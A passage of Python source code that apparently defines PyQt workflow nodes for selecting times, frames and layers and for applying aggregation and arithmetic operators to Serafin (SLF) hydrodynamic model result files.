self.success()\n\n\nclass AddRouseNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Add\\nRouse\\nNumbers'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n self.in_data = None\n self.data = None\n self.table = []\n self.settling_velocities = []\n\n def _configure(self):\n msg = SettlingVelocityMessage(self.settling_velocities, self.table)\n value = msg.exec_()\n if value != QDialog.Accepted:\n return 0\n self.table = msg.get_table()\n new_rouse = [self.table[i][0] for i in range(len(self.table))]\n new_names = [self.table[i][1] for i in range(len(self.table))]\n old_names = [self.in_data.selected_vars_names[var][0].decode(SLF_EIT).strip()\n for var in self.in_data.selected_vars]\n for rouse in new_rouse:\n if rouse in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'Duplicated value found.',\n QMessageBox.Ok)\n self.table = []\n self.settling_velocities = []\n return 1\n for name in new_names:\n if name in old_names:\n QMessageBox.critical(None, 'Error', 'Duplicated name found.',\n QMessageBox.Ok)\n self.table = []\n self.settling_velocities = []\n return 1\n for i in range(len(self.table)):\n self.settling_velocities.append(float(self.table[i][0][6:]))\n return 2\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if not self.in_data.header.is_2d or 'US' not in self.in_data.selected_vars:\n self.state = Node.NOT_CONFIGURED\n self.in_data = None\n elif self.settling_velocities:\n old_rouse = [self.table[i][0] for i in range(len(self.table))]\n old_names = [self.table[i][1] for i in range(len(self.table))]\n new_names = [self.in_data.selected_vars_names[var][0].decode(SLF_EIT).strip()\n for var in self.in_data.selected_vars]\n for rouse in old_rouse:\n if rouse in self.in_data.selected_vars: # duplicated value\n self.state = Node.NOT_CONFIGURED\n self.settling_velocities = []\n self.table = []\n self.in_data = None\n self.reconfigure_downward()\n self.update()\n return\n for name in old_names:\n if name in new_names: # duplicated value\n self.state = Node.NOT_CONFIGURED\n self.settling_velocities = []\n self.table = []\n self.in_data = None\n self.reconfigure_downward()\n self.update()\n return\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.settling_velocities and self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state == Node.SUCCESS:\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input data is not 2D.', QMessageBox.Ok)\n return\n if 'US' not in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'US not found.', QMessageBox.Ok)\n return\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self._reset()\n else:\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input data is not 2D.', QMessageBox.Ok)\n return\n if 'US' not in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'US not found.', QMessageBox.Ok)\n return\n self._reset()\n\n value = self._configure()\n if value == 0:\n return\n if value == 2:\n self.state = Node.READY\n else:\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def save(self):\n table = []\n for line in self.table:\n for j in range(3):\n table.append(line[j])\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()),\n ','.join(map(str, self.settling_velocities)), ','.join(table)])\n\n def load(self, options):\n values, table = options\n table = table.split(',')\n if values:\n self.settling_velocities = list(map(float, values.split(',')))\n for i in range(0, len(table), 3):\n self.table.append([table[i], table[i+1], table[i+2]])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_vars.extend([self.table[i][0] for i in range(len(self.table))])\n for i in range(len(self.table)):\n self.data.selected_vars_names[self.table[i][0]] = (bytes(self.table[i][1], SLF_EIT).ljust(16),\n bytes(self.table[i][2], SLF_EIT).ljust(16))\n self.data.equations = get_necessary_equations(self.in_data.header.var_IDs, self.data.selected_vars,\n is_2d=True, us_equation=self.data.us_equation)\n self.success()\n\n\nclass SelectTimeNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nTime'\n self.out_port.data_type = ('slf', 'slf 3d')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n self.selection = None\n\n self.new_options = tuple()\n self.start_index, self.end_index = -1, -1\n self.start_date, self.end_date = None, None\n self.sampling_frequency = 1\n\n def get_option_panel(self):\n slider = TimeRangeSlider()\n slider.setFixedHeight(30)\n slider.setMinimumWidth(600)\n\n self.selection = DoubleSliderBox(self)\n self.selection.startValue.setReadOnly(True)\n self.selection.endValue.setReadOnly(True)\n\n self.selection.clearText()\n slider.reinit(self.in_data.start_time, self.in_data.time_second, self.selection)\n\n if len(self.in_data.time) == 1:\n slider.setEnabled(False)\n self.selection.startIndex.setEnabled(False)\n self.selection.endIndex.setEnabled(False)\n self.selection.startValue.setEnabled(False)\n self.selection.endValue.setEnabled(False)\n\n self.selection.startIndex.editingFinished.connect(slider.enterIndexEvent)\n self.selection.endIndex.editingFinished.connect(slider.enterIndexEvent)\n\n self.selection.timeSamplig.editingFinished.connect(self._check)\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n\n if self.start_index > -1:\n self.selection.startIndex.setText(str(self.start_index+1))\n self.selection.endIndex.setText(str(self.end_index+1))\n slider.enterIndexEvent()\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n layout.addWidget(slider)\n layout.addWidget(self.selection)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _check(self):\n try:\n sampling_frequency = int(self.selection.timeSamplig.text())\n if sampling_frequency < 1:\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n except ValueError:\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n\n def _select(self):\n start_index = int(self.selection.startIndex.text())-1\n end_index = int(self.selection.endIndex.text())-1\n sampling_frequency = int(self.selection.timeSamplig.text())\n self.new_options = (start_index, end_index, sampling_frequency)\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n self.state = Node.NOT_CONFIGURED\n elif self.start_date is not None:\n new_time = list(map(lambda x: x + self.in_data.start_time, self.in_data.time_second))\n if self.start_date in new_time:\n self.start_index = new_time.index(self.start_date)\n self.state = Node.READY\n else:\n self.start_index = -1\n self.start_date = None\n self.end_index = -1\n self.end_date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n return\n if self.end_date in new_time:\n self.end_index = new_time.index(self.end_date)\n self.state = Node.READY\n else:\n self.start_index = -1\n self.start_date = None\n self.end_index = -1\n self.end_date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n return\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n QMessageBox.critical(None, 'Error', 'Cannot re-select time.',\n QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.start_index, self.end_index, self.sampling_frequency = self.new_options\n self.start_date, self.end_date = self.in_data.start_time + self.in_data.time_second[self.start_index], \\\n self.in_data.start_time + self.in_data.time_second[self.end_index]\n self.reconfigure_downward()\n\n def save(self):\n if self.start_date is None:\n str_start_date = ''\n str_end_date = ''\n else:\n str_start_date = self.start_date.strftime('%Y/%m/%d %H:%M:%S')\n str_end_date = self.end_date.strftime('%Y/%m/%d %H:%M:%S')\n\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()),\n str_start_date, str_end_date, str(self.sampling_frequency)])\n\n def load(self, options):\n start_date, end_date = options[0:2]\n if start_date:\n self.start_date = datetime.datetime.strptime(start_date, '%Y/%m/%d %H:%M:%S')\n self.end_date = datetime.datetime.strptime(end_date, '%Y/%m/%d %H:%M:%S')\n self.sampling_frequency = int(options[2])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_time_indices = list(range(self.start_index, self.end_index+1, self.sampling_frequency))\n self.success('You selected %d frames.' % len(self.data.selected_time_indices))\n\n\nclass SelectSingleFrameNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nSingle\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n\n self.selection = -1\n self.date = None\n self.slider = None\n self.new_option = -1\n\n def get_option_panel(self):\n self.slider = SimpleTimeDateSelection()\n self.slider.initTime(self.in_data.time, list(map(lambda x: x + self.in_data.start_time,\n self.in_data.time_second)))\n if self.selection > -1:\n self.slider.index.setText(str(self.selection+1))\n self.slider.slider.enterIndexEvent()\n self.slider.updateSelection()\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n layout.addWidget(self.slider)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = int(self.slider.index.text()) - 1\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n self.state = Node.NOT_CONFIGURED\n elif self.date is not None:\n new_time = list(map(lambda x: x + self.in_data.start_time, self.in_data.time_second))\n if self.date in new_time:\n self.selection = new_time.index(self.date)\n self.state = Node.READY\n else:\n self.selection = -1\n self.date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n QMessageBox.critical(None, 'Error', 'Cannot re-select time.',\n QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.selection = self.new_option\n self.date = self.in_data.start_time + self.in_data.time_second[self.selection]\n self.reconfigure_downward()\n\n def save(self):\n if self.date is None:\n str_date = ''\n else:\n str_date = self.date.strftime('%Y/%m/%d %H:%M:%S')\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str_date])\n\n def load(self, options):\n if options[0]:\n self.date = datetime.datetime.strptime(options[0], '%Y/%m/%d %H:%M:%S')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_time_indices = [self.selection]\n self.success()\n\n\nclass SelectSingleLayerNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nSingle\\nLayer'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf 3d',)\n self.in_data = None\n self.data = None\n\n ## Layer index (1-indexed) selection\n self.layer_selection = -1\n self.layer_type_box = None\n self.new_option = -1\n self.output_panel = None\n\n def get_option_panel(self):\n self.layer_type_box = QComboBox()\n self.layer_type_box.setFixedHeight(30)\n self.layer_type_box.setMaximumWidth(200)\n for iplan in range(self.in_data.header.nb_planes):\n self.layer_type_box.addItem('Layer %d' % (iplan + 1))\n if self.layer_selection > 0:\n self.layer_type_box.setCurrentIndex(self.layer_selection - 1)\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel('Select the layer'))\n hlayout.addWidget(self.layer_type_box)\n layout.addLayout(hlayout)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = self.layer_type_box.currentIndex() + 1\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n self.state = Node.NOT_CONFIGURED\n if self.layer_selection > 0:\n if self.layer_selection <= self.in_data.header.nb_planes + 1:\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if 'vertical_operator' in self.in_data.metadata:\n QMessageBox.critical(None, 'Error', 'Cannot re-select layer, already 2D.', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.layer_selection = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n if self.layer_selection is not None:\n vertical_operator = self.layer_selection\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(vertical_operator)])\n\n def load(self, options):\n if options[0]:\n self.layer_selection = int(options[0])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if input_data.header.is_2d:\n self.fail('the input file is not 3d')\n return\n if 'Z' not in input_data.selected_vars:\n self.fail('the variable Z is not found')\n return\n self.data = input_data.copy()\n self.data.operator = operations.SELECT_LAYER\n self.data.metadata['layer_selection'] = self.layer_selection\n self.success()\n\n\nclass VerticalAggregationNode(OneInOneOutNode):\n VERTICAL_OPERATIONS = ('Mean', 'Min', 'Max')\n DEFAULT_OPERATOR = 0 # `Mean`\n\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Vertical\\nAggregation'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf 3d',)\n self.in_data = None\n self.data = None\n\n ## Vertical operation among 'Max', 'Min' or 'Mean'\n self.vertical_operation = None\n self.vertical_operation_box = None\n self.new_option = -1\n self.output_panel = None\n\n def get_option_panel(self):\n option_panel = QWidget()\n vlayout = QVBoxLayout()\n vlayout.addWidget(QLabel('Operation over the vertical'))\n self.vertical_operation_box = QButtonGroup(option_panel)\n self.vertical_operation_box.setExclusive(True)\n for operation_name in VerticalAggregationNode.VERTICAL_OPERATIONS:\n button = QRadioButton(operation_name)\n if operation_name == self.vertical_operation:\n button.setChecked(True)\n self.vertical_operation_box.addButton(button)\n vlayout.addWidget(button)\n option_panel.setLayout(vlayout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _get_default_option(self):\n return VerticalAggregationNode.VERTICAL_OPERATIONS[VerticalAggregationNode.DEFAULT_OPERATOR]\n\n def _select(self):\n if self.vertical_operation_box.checkedButton() is not None:\n operation = self.vertical_operation_box.checkedButton().text()\n self.new_option = operation\n else:\n self.new_option = None\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if 'vertical_operator' in self.in_data.metadata:\n QMessageBox.critical(None, 'Error', 'Cannot re-define an operation over the vertical!', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.vertical_operation = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n if self.vertical_operation is None:\n vertical_operator = self._get_default_option()\n else:\n vertical_operator = self.vertical_operation\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(vertical_operator)])\n\n def load(self, options):\n self.vertical_operation = options[0]\n if self.vertical_operation not in VerticalAggregationNode.VERTICAL_OPERATIONS:\n raise NotImplementedError('Vertical operation %s is not supported' % self.vertical_operation)\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if input_data.header.is_2d:\n self.fail('the input file is not 3d')\n return\n if 'Z' not in input_data.selected_vars:\n self.fail('the variable Z is not found')\n return\n self.data = input_data.copy()\n self.data.operator = operations.VERTICAL_AGGREGATION\n self.data.metadata['vertical_operator'] = self.vertical_operation\n self.success()\n\n\nclass SynchMaxNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'SynchMax'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n self.in_data = None\n self.data = None\n\n self.var = ''\n self.var_box = None\n self.new_option = ''\n\n def get_option_panel(self):\n self.var_box = QComboBox()\n self.var_box.setFixedHeight(30)\n available_vars = self.in_data.selected_vars\n for var in available_vars:\n self.var_box.addItem(var)\n if self.var:\n self.var_box.setCurrentIndex(available_vars.index(self.var))\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel('Select the reference variable'))\n hlayout.addWidget(self.var_box)\n layout.addLayout(hlayout)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = self.var_box.currentText()\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if not self.in_data.header.is_2d or len(self.in_data.selected_time_indices) == 1:\n self.state = Node.NOT_CONFIGURED\n elif self.in_data.operator is not None:\n self.state = Node.NOT_CONFIGURED\n elif self.var:\n available_vars = self.in_data.selected_vars\n if self.var in available_vars:\n self.state = Node.READY\n else:\n self.var = ''\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input file is not 2D.', QMessageBox.Ok)\n return\n if len(self.in_data.selected_time_indices) <= 1:\n QMessageBox.critical(None, 'Error', 'The input file must have more than one frame.', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.var = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), self.var])\n\n def load(self, options):\n self.var = options[0]\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.operator = operations.SYNCH_MAX\n self.data.metadata = {'var': self.var}\n self.success()\n\n\nclass UnaryOperatorNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.state = Node.READY\n self.data = None\n self.message = 'Nothing to configure.'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n\n def reconfigure(self):\n super().reconfigure()\n self.state = Node.READY\n self.reconfigure_downward()\n\n def configure(self, check=None):\n if super().configure():\n self.reconfigure_downward()\n\n def run(self):\n pass\n\n\nclass BinaryOperatorNode(TwoInOneOutNode):\n def __init__(self, index, operator=None):\n super().__init__(index)\n self.operator = operator\n self.state = Node.READY\n self.data = None\n self.message = 'Nothing to configure.'\n self.out_port.data_type = ('slf out',)\n self.first_in_port.data_type = ('slf', 'slf reference')\n self.second_in_port.data_type = ('slf',)\n\n def reconfigure(self):\n super().reconfigure()\n self.state = Node.READY\n self.reconfigure_downward()\n\n def configure(self, check=None):\n if super().configure():\n self.reconfigure_downward()\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.first_in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if input_data.filename == self.second_in_port.mother.parentItem().data.filename:\n self.fail('the two inputs cannot be from the same file.')\n return\n\n self.data = input_data.copy()\n self.data.operator = self.operator\n self.data.metadata = {'operand': self.second_in_port.mother.parentItem().data.copy()}\n self.success()\n\n\nclass ConvertToSinglePrecisionNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Convert to\\nSingle\\nPrecision'\n self.out_port.data_type = ('slf', 'slf 3d')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_double_precision():\n self.fail('the input file is not of double-precision format.')\n return\n if input_data.to_single:\n self.fail('the input data is already converted to single-precision format.')\n return\n\n self.data = input_data.copy()\n self.data.to_single = True\n self.success()\n\n\nclass SelectFirstFrameNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nFirst\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if len(input_data.selected_time_indices) != len(input_data.time):\n self.fail('cannot re-select time.')\n return\n\n self.data = input_data.copy()\n self.data.selected_time_indices = [0]\n self.success()\n\n\nclass SelectLastFrameNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nLast\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if len(input_data.selected_time_indices) != len(input_data.time):\n self.fail('cannot re-select time.')\n return\n\n self.data = input_data.copy()\n self.data.selected_time_indices = [len(input_data.time)-1]\n self.success()\n\n\nclass ComputeMaxNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Max'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MAX\n self.success()\n\n\nclass ComputeMinNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Min'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MIN\n self.success()\n\n\nclass ComputeMeanNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Mean'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MEAN\n self.success()\n\n\nclass MinusNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.DIFF)\n self.category = 'Operators'\n self.label = 'A Minus B'\n\n\nclass ReverseMinusNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.REV_DIFF)\n self.category = 'Operators'\n self.label = 'B Minus A'\n\n\nclass ProjectMeshNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.PROJECT)\n self.category = 'Operators'\n self.label = 'Project B\\non A'\n\n\nclass MaxBetweenNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.MAX_BETWEEN)\n self.category = 'Operators'\n self.label = 'Max(A,B)'\n\n\nclass 